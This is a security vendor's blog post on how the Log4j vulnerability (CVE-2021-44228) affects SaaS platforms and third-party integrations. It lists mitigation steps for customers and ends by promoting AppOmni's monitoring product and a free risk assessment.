How Log4j May Impact Your SaaS and 3rd-Party Apps - and What You Can Do
Log4j is a critical vulnerability in a widely-used software that can have far-reaching and costly impacts. Organizations of all sizes, from small online retailers to the most recognized brands to government agencies, are impacted. One of AppOmni’s core values is to build trust with transparency, which includes offering information and perspective about security issues. Read on for our take on Log4j and what organizations can do to protect their systems.
What is Log4j?
Log4j2 is an open-source, Java-based logging framework developed by collaborators of the Apache Software Foundation. It’s popular with commercial software developers and runs on all major platforms, including Windows, Linux, and macOS. A critical vulnerability (CVE-2021-44228) impacting the Log4j2 utility was reported between late November and early December 2021. The flaw means attackers can take control of any system using the software, and the vulnerability is being exploited by bad actors worldwide.
Are SaaS applications impacted?
Many technologies are impacted including firewalls, servers, video conferencing platforms, and more. SaaS applications are also impacted. Many SaaS vendors have Log4j as part of their platform, and are working to mitigate impacts to their customers. Visit CISA for a list of applications with their Log4j vulnerability status along with information on vendor updates.
Are third-party apps affected?
Third-party integrations into SaaS applications are also vulnerable. Many of these third-party solutions can read, write, and delete sensitive data. They can also access user groups, workspaces, or multiple areas in the corporate network. Many issues can arise with third-party apps, including uncertainty around knowing which apps are approved, what permissions an app has, and who can install an app. It’s also often unknown what users are doing with the data accessed by apps.
What are the potential vulnerabilities to SaaS applications?
There are a few potential Log4j vulnerabilities for SaaS applications:
- Nefarious actors could use Log4j to change access and/or security settings within SaaS applications. For example, by turning off encryption or giving someone access to data that they shouldn’t have.
- Data, including usernames and passwords, could be exported, deleted, or otherwise compromised.
- Data can also be compromised through third-party apps such as Data Loader in Salesforce, or other apps installed through application-specific marketplaces.
- And other Log4j-related vulnerabilities continue to be discovered.
Who is responsible for ensuring all vulnerabilities are secured: SaaS vendors or SaaS customers?
SaaS security has a shared responsibility model, which means both vendors and customers are responsible for security. SaaS vendors have the responsibility to offer secure products and services. They generally do this well, as they invest heavily in security and employ some of the best teams in the world. But the responsibility of configuring, managing, and actually using the product ultimately lies with the customer.
When it comes to Log4j, the majority of the responsibility falls to SaaS vendors to ensure that their products are not affected – or if they are affected, that they are patching and mitigating the vulnerability. But that doesn’t mean that SaaS customers are powerless until their vendor takes action. Visibility into the systems and applications used will be critical to determine an organization’s level of risk.
What should SaaS customers be doing to protect themselves?
There are a few things customers can do to protect their systems and data, including:
- Inventory and audit all SaaS applications, including third-party applications. Make sure the IT and security team have visibility into all SaaS apps in use, especially those that may have been connected by end users.
- Get an understanding of exactly what those third-party apps can do: the totality of access granted through OAuth, what SaaS apps and data they have access to, etc.
- Check the CISA site for a list of applications with their Log4j vulnerability status and information on vendor updates.
- Update as many of your systems as you can, as quickly as possible, to the latest versions.
- Implement a solid SaaS Security Posture Management (SSPM) tool to increase your visibility and keep you informed. Continuous monitoring is essential to alert admins when access levels change or encryption is turned off, as can be done with the Log4j vulnerability.
How does AppOmni protect its customers from Log4j?
Most security teams find it challenging to secure heterogenous SaaS environments that require real depth of expertise in each application. It can be difficult to even answer a simple question such as: “Has my SaaS environment been compromised and, if so, how?” AppOmni’s continuous SaaS security monitoring delivers instant visibility into SaaS configuration drift and removes the burden from security teams by providing SaaS audit log monitoring and detection capabilities across business critical SaaS applications. Any abnormal or inappropriate activity that could occur in a Log4j-compromised SaaS environment (such as suspicious logins, configuration change activities, brute force attempts, data access, bulk exfiltration or deletion) is automatically discovered through built-in detections of SaaS application events.
AppOmni also protects against third-party app vulnerabilities. AppOmni can inventory and monitor the third-party apps and OAuth grants connected and integrated into SaaS environments to provide visibility into any Log4j-associated changes that could compromise systems.
Is AppOmni software vulnerable to Log4j?
No. Log4j is not a component of the AppOmni platform, so the AppOmni product is not vulnerable to CVE-2021-44228.
Find out who has access to your SaaS data
AppOmni’s SaaS security management platform gives security and IT teams an easy and automated way to secure their SaaS data and environments.
Get A Free Risk Assessment
Misconfiguration is a leading cause of SaaS data breaches.
AppOmni’s research shows that 95% of companies have external users with over-privileged access to data, and more than 55% of companies have sensitive data that’s inadvertently exposed to the anonymous internet.
Our risk assessment delivers visibility into who and what has access to your SaaS data and will help determine whether your security configurations match your business intent.